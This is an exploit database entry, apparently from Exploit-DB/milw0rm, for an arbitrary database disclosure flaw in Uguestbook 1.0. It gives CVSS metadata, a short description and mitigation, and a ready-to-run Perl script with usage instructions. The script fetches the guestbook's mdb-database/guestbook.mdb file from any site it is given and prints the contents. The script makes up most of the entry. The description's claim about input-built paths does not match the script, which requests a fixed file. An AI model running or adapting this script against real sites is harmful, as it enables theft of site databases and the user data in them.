Uguestbook 1.0 Arbitrary Database Disclosure Exploit

vendor:

Uguestbook

by:

Cyber-Zone (ABDELKHALEK)

7,5

CVSS

HIGH

Arbitrary Database Disclosure

200

CWE

Product Name: Uguestbook

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Uguestbook 1.0 Arbitrary Database Disclosure Exploit

Uguestbook 1.0 is vulnerable to an arbitrary database disclosure vulnerability. An attacker can exploit this vulnerability to gain access to the database and view its contents. The vulnerability is due to the application not properly validating user-supplied input before using it to construct a path to the database. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable application. This will allow the attacker to view the contents of the database.

Mitigation:

Ensure that user-supplied input is properly validated before using it to construct a path to the database.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#
# Uguestbook 1.0
# mdb-database/guestbook.mdb
#
#
#
#
#
#
#
use LWP::Simple;
use LWP::UserAgent;

print "\tUguestbook 1.0 Arbitrary Database Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *\n";
print "\t*           E-mail : Paradis_des_fous[at]hotmail.fr            *\n";
print "\t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *\n";
print "\t*               From : MoroccO Figuig/Oujda City               *\n";
print "\t****************************************************************\n\n\n\n";
if(@ARGV < 1)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 site \n";
print "[X] Exemple : perl $0 www.site.com \n";
}
($site) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);
$database = "mdb-database/guestbook.mdb";
my $exploit = "http://" . $site . "/" . $database;
print("Searching For file ...\n\n");
sleep(3);
$doexploit=get $exploit;
if($doexploit){
print("..........................File Contents...........................\n");
print("$doexploit\n");
print("..............................EOF.................................\n");
}
else {
help();
exit;
}

# milw0rm.com [2009-05-04]